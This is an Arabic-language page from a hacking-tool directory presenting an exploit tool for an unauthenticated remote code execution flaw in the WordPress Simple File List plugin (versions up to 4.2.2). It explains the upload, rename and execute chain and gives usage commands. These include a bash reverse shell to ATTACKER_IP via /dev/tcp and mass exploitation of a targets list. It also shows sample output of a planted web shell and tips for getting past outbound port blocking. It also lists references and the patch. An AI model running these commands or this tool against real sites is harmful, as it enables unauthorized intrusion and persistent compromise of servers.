Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-34085 — استغلال لـ CVE-2025-34085 | Kitploit
أدوات/GitHubGitHub/0xgunrunner/cve-2025-34085
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xgunrunner/cve-2025-34085

CVE-2025-34085

استغلال لـ CVE-2025-34085

عرض المستودع
13منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-34085 — ثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في WordPress Simple File List

أداة استغلال آلية لـ CVE-2025-34085 (مكررة لـ CVE-2020-36847)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في إضافة WordPress Simple File List الإصدارات ≤ 4.2.2.

ملاحظة: تم رفض CVE-2025-34085 من قبل MITRE باعتبارها مكررة لـ CVE-2020-36847. الثغرة حقيقية وتم إصلاحها في الإصدار 4.2.3. يشير كلا المعرفين إلى نفس المشكلة الأساسية.

ملخص الثغرة

الحقلالتفاصيل
CVECVE-2025-34085 / CVE-2020-36847
الإضافةSimple File List
الإصدارات المتأثرة≤ 4.2.2
الإصدار المُصلح4.2.3
النوعرفع ملف غير مقيد → تجاوز إعادة التسمية → RCE
CVSS9.8 (حرجة)
المصادقةلا حاجة للمصادقة
الاكتشاف الأصليcoiffeur
وحدة Metasploitexploit/multi/http/wp_simple_file_list_rce

آلية العمل

  1. الرفع — يتم رفع حمولة PHP مقنعة كملف .png عبر نقطة رفع الإضافة (ee-upload-engine.php). يتحقق محرك الرفع من الامتدادات لكنه يقبل ملفات الصور.

  2. إعادة التسمية — وظيفة إعادة التسمية في الإضافة (ee-file-engine.php) لا تفرض قيودًا على الامتدادات. يقوم المهاجم بإعادة تسمية الملف .png إلى .php (أو .phtml، .php5، .php3).

  3. التنفيذ — يصبح ملف PHP المعاد تسميته متاحًا وقابلاً للتنفيذ في دليل التحميلات في /wp-content/uploads/simple-file-list/، مما يمنح المهاجم القدرة على تنفيذ أوامر عشوائية.

المتطلبات

root@kitploit:~
pip install requests colorama

بايثون 3.6+

الاستخدام

هدف واحد

root@kitploit:~
python3 CVE-2025-34085.py -u http://target.com --cmd "id"

هدف واحد مع أمر مباشر (بدون معامل ?cmd=)

root@kitploit:~
python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline

الفحص الجماعي

أنشئ ملف targets.txt يحتوي على رابط واحد في كل سطر:

root@kitploit:~
http://target1.com
http://target2.com
https://target3.com
root@kitploit:~
python3 CVE-2025-34085.py --cmd "id"

الوسائط

الوسيطةالوصفالافتراضي
-u, --urlرابط هدف واحد—
--cmdالأمر المراد تنفيذه على الهدفid
--inlineحقن الأمر مباشرة في شل PHP (مضمن، لا يوجد شل ويب ?cmd=)False

نصيحة: استخدم --inline عندما تحتاج إلى شل عكسي أو عندما يحتوي الهدف على تصفية لمعاملات الاستعلام. بدون --inline، تقوم الأداة بإسقاط شل ويب يقبل الأوامر عبر ?cmd=.

المخرجات

يتم تسجيل الاستغلالات الناجحة في vuln.txt:

root@kitploit:~
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)

ملاحظات أمنية لـ OSCP

  • تقوم الأداة برفع ملف PHP على القرص — وهذا سيترك آثارًا.
  • يبقى شل الويب ثابتًا في /wp-content/uploads/simple-file-list/<random>.php
  • يتم تسجيل عمليات الرفع الناجحة محليًا في vuln.txt — مفيد لتقريرك.
  • بالنسبة للامتحان، استخدم --inline مع شل عكسي لتجنب ترك شل ويب دائم بـ ?cmd=.
  • إذا قام الهدف بحظر المنافذ الصادرة، جرب المنافذ المسموح بها الشائعة (80، 443، 53).

المراجع

  • NVD — CVE-2025-34085
  • NVD — CVE-2020-36847
  • Wordfence Advisory
  • Metasploit Module
  • Plugin Changelog (Patch)
  • Exploit-DB #48979
  • Original PoC by coiffeur — Exploit-DB #48349

المعالجة

قم بترقية إضافة Simple File List إلى الإصدار 4.2.3 أو أحدث.

إخلاء مسؤولية

هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احرص دائمًا على الحصول على التصريح المناسب قبل الاختبار.

الاعتمادات

  • اكتشاف الثغرة الأصلي: coiffeur
  • نص الاستغلال الأصلي: 0xgh057r3c0n, B1ack4sh (Ashwesker)
  • يتم الصيانة بواسطة: 0xgunrunner
تنزيل الأداة